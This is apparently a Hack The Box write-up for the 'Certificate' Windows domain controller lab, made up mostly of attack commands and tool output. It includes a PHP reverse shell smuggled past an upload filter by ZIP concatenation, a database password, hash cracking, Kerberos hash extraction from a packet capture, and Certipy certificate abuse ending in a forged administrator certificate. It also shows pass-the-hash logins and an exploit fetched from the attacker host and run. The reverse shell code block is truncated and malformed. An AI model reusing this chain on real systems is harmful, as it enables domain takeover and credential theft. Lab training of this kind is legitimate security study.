Skip to content

Certificate - Hack The Box

🚨 Follow the HTB grind in real-time — leaks, drops, and deep writeups
👉 t.me/nosecpwn
Don't read. Join.

Platform: Windows
IP: 10.10.11.71
Difficulty: Hard
Author: NoSec


Recon

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb)
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb)
3269/tcp open  ssl/ldap
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0
Service Info: Host: DC01; OS: Windows

Clock-skew

  • Time synchronization is required for Kerberos!
sudo rdate -n certificate.htb

Web Exploitation – RCE via Upload

You can register on the site and click “Enroll” on any course to get a URL like:

http://certificate.htb/upload.php?s_id=36

It only allows uploading PDF and ZIP files.
I used a ZIP concatenation trick so that the actual PHP shell is appended at the end while keeping a valid ZIP structure.

Steps

  1. Create a PHP reverse shell (shell.php)

```php

array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>

3. Create an empty PDF (e.g. `test.pdf`)  
4. Merge ZIPs:
```bash
zip head.zip test.pdf
zip -r tail.zip nosechere   # nosechere/shell.php
cat head.zip tail.zip > main.zip
  1. Upload main.zip
  2. Browse to:
http://certificate.htb/static/uploads/[...]/nosechere/shell.php
  1. Netcat listener:
nc -lvnp 4444

Initial shell user: xamppuser


Database Enumeration & Access

.\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;" -E
  • Username: sara.b
  • Bcrypt Hash: $2y$04$CgDe/...

Cracking

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Password: Bl******

WinRM

evil-winrm -i 10.10.11.71 -u Sara.B -p 'Bl******'

⚠️ Note: HTB patched the password reset trick on June 10, 2025!


PCAP Analysis – Kerberos Hash Extraction

https://github.com/jalvarezz13/Krb5RoastParser

python krb5_roast_parser.py WS-01_PktMon.pcap as_req >> hash.txt

Hashcat Crack

hashcat -m 19900 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Password: !QA*****


Certipy – PFX Requests

Lion.SK

certipy req -u 'lion.sk@CERTIFICATE.HTB' -p "\!QA<pass>" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 24
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saved certificate and private key to 'lion.sk.pfx'

Ryan.K

certipy req -u 'lion.sk@CERTIFICATE.HTB' -p "\!QA<pass>" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saved certificate and private key to 'ryan.k.pfx'

NTLM hash dump

certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: ryan.k@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eea<hash>

WinRM:

evil-winrm -i 10.10.11.71 -u ryan.k -H [ryan.k_hash]

Privilege Escalation

whoami /priv
# SeManageVolumePrivilege

https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public / SeaManageVolumeExploit.exe download

Exploit:

curl 10.10.14.8/SeManageVolumeExploit.exe -O ...
.\SeManageVolumeExploit.exe

Test:

echo "test" > C:\Windows\test.txt
type C:\Windows\test.txt

Export CA

mkdir /temp
certutil -exportPFX my "Certificate-LTD-CA" C:temp\ca.pfx

Download CA

download ca.pfx

Admin PFX forge

certipy forge -ca-pfx ca.pfx -upn 'administrator@certificate.htb' -out forged_admin.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'forged_admin.pfx'

Admin NTLM hash dump

certipy auth -dc-ip '10.10.11.71' -pfx 'forged_admin.pfx' -username 'administrator' -domain 'certificate.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad<hash>

Root / Administrator Access

evil-winrm -i 10.10.11.71 -u administrator -H d80430...

root.txt captured ✅


🧠 Notes & Reflections – What I learned from this box

  • Full AD attack chain
  • ZIP concat trick
  • ADCS/PKI abuse
  • Kerberoasting from PCAP
  • Shadow Credentials
  • Certificate forging

⚠️ Mistakes, Pitfalls & Tips

  • Time sync is a must!
  • Password reset was patched (June 10, 2025)

✅ Summary

Certificate is an excellent ADCS compromise lab.
Recommended for anyone getting into Red/Blue Teaming, PKI abuse, and modern AD attacks.

Feel free to reach out if you have questions!